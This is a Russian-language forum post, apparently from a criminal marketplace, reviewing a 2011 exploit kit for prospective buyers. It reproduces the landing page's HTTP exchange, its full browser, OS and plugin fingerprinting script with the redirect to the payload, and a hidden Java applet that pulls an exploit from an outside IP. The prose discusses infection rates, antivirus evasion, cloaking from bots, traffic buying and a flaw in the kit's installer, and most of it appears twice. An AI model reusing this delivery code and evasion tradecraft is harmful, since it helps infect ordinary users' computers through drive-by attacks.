Итак, небольшой обзор от меня.
С начала люто удивился подходу автора к связке как таковой, и отнесся с недоверием.
Постучал за тестом, на что после нескольких моих косяков с криптом, мне любезно выдали сначала ip,
приняли от меня ехе, предоставили линк для просмотра гостевой статистики, и линк для слива трафа.
Автор ни в какую не хотел рассказывать про состав сплойтов, сказал лишь, что сервер действительно под винду.
IP немецкий. Приятно. Скорости: 12мб по ДЕ, и 1мб за Германию. (все это условно - что спидтестеры напоказывали)
Сама выдача связки перевешена с 80го порта на 8181 (что весьма полезно против шлака, который скитается по сети на автопилоте, и забивает статистику)
Линк вида http://176.64.133.68:8181/hGY?hiGY=15
Причем все что после порта можно менять как угодно - выдачу это не меняет (но определенно влияет на учет трафа в админке)
Итак.
На гугл-бота в ЮА выдается 404.
Кука не зависит от агента, и видимо привязана к ip.
Тело ответа:
Если js отключен, то вылетаем на 404. Хорошо) Ибо параноики всеравно пропатченые.
Ботам оно правда пофигу. Все давно js хавают.
Код никак не обфусцирован. Глаз веб-мастеру не режет. И в блеки ав попадать не будет, т.к все (или почти все) функи есть в паблике.
Тоесть страница с детектами вообще заразы не содержит.
base64encode(str) - делает то что положено.
GetOs() - аналогично
DetectBrowser() - правильные проверки для оперы и хрома.
CheckSoft() - собираем все плагины, и отдельно чекаем яву (ибо JavaEnabled() глючит от браузера к браузеру).
Собираем все это в урл, и летим на него.
*летать можно сколько угодно раз. Линк для юзера не умирает. Он спокойно получит сплойты и второй и десятый раз.
Выдача:
Получаем пдф, сейвим.
Всего 8.3Кб
Оставлю его на разбор людям шарящим.
Забавная картина в хроме:
в фф аналогично.
Зачем собирать плагины, и при явном отсутствии пдф-вьюера отдавать пдф... Это огорчило. Придется вешать свои проверки.
Структура директорий никак не рандомизируется. Нашлось кажется все:
И инсталлер:
В инсталлере затисалась копипаста. Все инпуты гордо несли id="input1".
Можно даже сделать вот так:
Опустим пока этот момент (из этических соображений, ибо потрошить-то никто не просил).
Идем дальше:
Так же нашелся phpmyadmin. (заинстален сюда C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\phpmyadmin\ )
Вход в гостевую стату - по ключу в урле (md5 от чего-то). Многоразовый.
Внутри аскетично - пришло, пробито и процент.
Полную стату мне не дали (раз не дали, значит скрины показывать не стоит))
Когда дело дошло до слива трафа, я честно признался, что врятли стану их клиентом. И слить мне ничего не дали, пожелав удачи
Так что, увы, пробив потестить не удалось.
Впечатление осталось позитивное, но смутноватое...
Автор адекватен бесспорно, но жутко секретничает. Несколько раз акцентировал работу "на качество" а не "на количество".
Дизайн админки - чисто "для галочки". Изысков немного. Стата скуповата, но явно лучше феникса например).
Пробив по заявлениям автора - 15% (несмотря на то, что как я ни волохался, ничего кроме пдф-ки снять не смог - она выдавалась мне всегда и на все). Надо полагать, что я плох в снятии сплойтов, и ява там хорошо спрятана (без иронии).
Быстродействие связки:
Вся выдача умещается в 15кб. Время загрузки в среднем 0.2-0.4 сек (на пустом сервере) Под нагрузкой потестить возможности не было.
Про внутреннее устройство рассказывать не стали, обмолвившись лишь об очень быстром бэкэнде.
Палевность для ав - минимальна, т.к. статика всегда чистая (ибо белая))
Все что представляется в UA не пятеркой браузеров - получает 404.
Жаль что обзор получился без самого вкусного. Пробив, быстродействие, и время жизни в чистоте - оставлю возможность потестить будущим клиентам.
Внутреннее устройство освещать не буду, ибо меня вовремя стерли с сервера XD
Косяк с открытым инсталлером я думаю быстро пофиксят.
скриншот с пробивом от автора:
15% на фф. что вобщем, ныне хуже, чем в среднем по рынку. (видимо еще не добавили последний явасплойт)
С начала люто удивился подходу автора к связке как таковой, и отнесся с недоверием.
Постучал за тестом, на что после нескольких моих косяков с криптом, мне любезно выдали сначала ip,
приняли от меня ехе, предоставили линк для просмотра гостевой статистики, и линк для слива трафа.
Автор ни в какую не хотел рассказывать про состав сплойтов, сказал лишь, что сервер действительно под винду.
IP немецкий. Приятно. Скорости: 12мб по ДЕ, и 1мб за Германию. (все это условно - что спидтестеры напоказывали)
Как есть винда, не обманули) на мордашке заботливо висит апач.
Сама выдача связки перевешена с 80го порта на 8181 (что весьма полезно против шлака, который скитается по сети на автопилоте, и забивает статистику)
Линк вида http://176.64.133.68:8181/hGY?hiGY=15
Причем все что после порта можно менять как угодно - выдачу это не меняет (но определенно влияет на учет трафа в админке)
Итак.
Код:
GET /hITGY?hiGY=14 HTTP/1.1
Host: 121.45.134.19:8181
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Accept: text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
Код:
HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 18:39:27 GMT
Server: Apache/2.2.19 (Win32) PHP/5.3.6
Set-Cookie: adcDq=b05d51a8-7872-4001-ab7f-663fa4c5a7cc
Content-Length: 4516
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/htmlТело ответа:
Код:
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0; url=lCben?CfLob=2412718735&hjMeL">
</noscript>
</head>
<body>
<script language="javascript">
function base64encode(str) {
var base64EncodeChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
var out, i, len;
var c1, c2, c3;
len = str.length;
i = 0;
out = '';
while(i < len) {
c1 = str.charCodeAt(i++) & 0xff;
if(i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt((c1 & 0x3) << 4);
out += '==';
break;
}
c2 = str.charCodeAt(i++);
if(i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt((c2 & 0xF) << 2);
out += '=';
break;
}
c3 = str.charCodeAt(i++);
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >>6));
out += base64EncodeChars.charAt(c3 & 0x3F);
}
return out;
}
function GetOs() {
$os = "";
$useragent = navigator.userAgent;
if ($useragent.indexOf("Windows 95") != -1) $os = "95";
else if ($useragent.indexOf("Windows NT 4") != -1) $os = "NT4";
else if ($useragent.indexOf("Windows 98") != -1) $os = "98";
else if ($useragent.indexOf("Win 9x 4.9") != -1) $os = "ME";
else if ($useragent.indexOf("Windows NT 5.0") != -1) $os = "2000";
else if ($useragent.indexOf("Windows NT 5.1") != -1) $os = "XP";
else if ($useragent.indexOf("Windows NT 5.2") != -1) $os = "2003";
else if ($useragent.indexOf("Windows NT 6.0") != -1) $os = "Vista";
else if ($useragent.indexOf("Windows NT 6.1") != -1) $os = "Seven";
else if ($useragent.indexOf("Linux") != -1) $os = "Linux";
else if ($useragent.indexOf("Mac OS") != -1) $os = "MacOS";
else $os = "Other";
return $os;
}
function DetectBrowser() {
var browser = [];
useragent = navigator.userAgent;
if (res = /opera\s?\/?(\d+).(\d+)/i.exec(useragent)) {
browser[0] = "Opera";
browser[1] = res[1];
browser[2] = res[2];
res = /Version\s?\/?(\d+).(\d+)/i.exec(useragent);
if (res) {
browser[1] = res[1];
browser[2] = res[2];
}
}
else if (res = /msie\s(\d+).(\d+)/i.exec(useragent)) {
browser[0] = "ie";
browser[1] = res[1];
browser[2] = res[2];
}
else if (res = /firefox\/(\d+).(\d+)/i.exec(useragent)) {
browser[0] = "Firefox";
browser[1] = res[1];
browser[2] = res[2];
}
else if (res = /Chrome\/?\s?(\d+)\.(\d+)/i.exec(useragent)) {
browser[0] = "Chrome";
browser[1] = res[1];
browser[2] = res[2];
}
else if (res = /Safari\/(\d+)\.(\d+)/i.exec(useragent)) {
browser[0] = "Safari";
browser[1] = res[1];
browser[2] = res[2];
res = /Version\/?(\d+).(\d+)/i.exec(useragent);
if (res) {
browser[1] = res[1];
browser[2] = res[2];
}
} else {
browser[0] = "Other";
browser[1] = "0";
browser[2] = "0";
}
return browser;
}
function CheckSoft() {
var PlugName = "";
try {
if( navigator.plugins && navigator.mimeTypes.length) {
for( var i = 0; i < navigator.plugins.length; i++) {
PlugVersion = /\d+\.\d+/.exec(navigator.plugins[i].description);
if (!PlugVersion) {
PlugVersion = ""; // ?
}
jf = navigator.plugins[i].name.match(/Java[^\d]+(\d) U(\d+)/);
if (jf) {
PlugName = PlugName + navigator.plugins[i].name + " [" + jf[1] + "." + jf[2] + "]|";
} else {
PlugName = PlugName + navigator.plugins[i].name + " [" + PlugVersion + "]|";
}
}
}
}
catch(e) {}
return PlugName;
}
Browser = DetectBrowser();
os = base64encode(GetOs());
BrowserName = base64encode(Browser[0]);
BrowserVer = base64encode(Browser[1] + "." + Browser[2]);
Plugins = base64encode(CheckSoft());
location.replace("lCben?CfLob=2412718735&GmzjZ=" + Plugins + "&N4Riz=" + os + "&7cIf9=" + BrowserName + "&OFCPk=" + BrowserVer);
</script>
</body>
</html>Ботам оно правда пофигу. Все давно js хавают.
Код никак не обфусцирован. Глаз веб-мастеру не режет. И в блеки ав попадать не будет, т.к все (или почти все) функи есть в паблике.
Тоесть страница с детектами вообще заразы не содержит.
base64encode(str) - делает то что положено.
GetOs() - аналогично
DetectBrowser() - правильные проверки для оперы и хрома.
CheckSoft() - собираем все плагины, и отдельно чекаем яву (ибо JavaEnabled() глючит от браузера к браузеру).
Собираем все это в урл, и летим на него.
*летать можно сколько угодно раз. Линк для юзера не умирает. Он спокойно получит сплойты и второй и десятый раз.
Код:
http://beat**.in:8181/lC****?C**Lob=2****35&GmzjZ=U2h***sYXNoIFsxMS4xXXxHb29nbGUgVXBkYXRlIFtdfA==&N4Riz=U2V2ZW4=&7cIf9=T3BlcmE=&OFCPk=MTEuNjE=
Код:
<html><head></head>
<body>
<applet archive="20" code="RH1.R0H1.class" width="1" height="1"><param name="url" value="http://123.65.235.55:8181/XGCMi?expid=10&fid=21"></applet>
</body>
</html>Всего 8.3Кб
Оставлю его на разбор людям шарящим.
Забавная картина в хроме:
в фф аналогично.
Зачем собирать плагины, и при явном отсутствии пдф-вьюера отдавать пдф... Это огорчило. Придется вешать свои проверки.
Структура директорий никак не рандомизируется. Нашлось кажется все:
И инсталлер:
В инсталлере затисалась копипаста. Все инпуты гордо несли id="input1".
Можно даже сделать вот так:
Опустим пока этот момент (из этических соображений, ибо потрошить-то никто не просил).
Идем дальше:
Так же нашелся phpmyadmin. (заинстален сюда C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\phpmyadmin\ )
Вход в гостевую стату - по ключу в урле (md5 от чего-то). Многоразовый.
Внутри аскетично - пришло, пробито и процент.
Полную стату мне не дали (раз не дали, значит скрины показывать не стоит))
Когда дело дошло до слива трафа, я честно признался, что врятли стану их клиентом. И слить мне ничего не дали, пожелав удачи
Так что, увы, пробив потестить не удалось.
Впечатление осталось позитивное, но смутноватое...
Автор адекватен бесспорно, но жутко секретничает. Несколько раз акцентировал работу "на качество" а не "на количество".
Дизайн админки - чисто "для галочки". Изысков немного. Стата скуповата, но явно лучше феникса например).
Пробив по заявлениям автора - 15% (несмотря на то, что как я ни волохался, ничего кроме пдф-ки снять не смог - она выдавалась мне всегда и на все). Надо полагать, что я плох в снятии сплойтов, и ява там хорошо спрятана (без иронии).
Быстродействие связки:
Вся выдача умещается в 15кб. Время загрузки в среднем 0.2-0.4 сек (на пустом сервере) Под нагрузкой потестить возможности не было.
Про внутреннее устройство рассказывать не стали, обмолвившись лишь об очень быстром бэкэнде.
Палевность для ав - минимальна, т.к. статика всегда чистая (ибо белая))
Все что представляется в UA не пятеркой браузеров - получает 404.
Тут "приукрасили" явно. Js все давно выполняют. Но закрыв выдачу пачкой проверок, сильно облегчили себе чистки) Т.к. доходить будет меньше юзеров с заинсталенными ав.
Жаль что обзор получился без самого вкусного. Пробив, быстродействие, и время жизни в чистоте - оставлю возможность потестить будущим клиентам.
Внутреннее устройство освещать не буду, ибо меня вовремя стерли с сервера XD
Косяк с открытым инсталлером я думаю быстро пофиксят.
скриншот с пробивом от автора:
15% на фф. что вобщем, ныне хуже, чем в среднем по рынку. (видимо еще не добавили последний явасплойт)
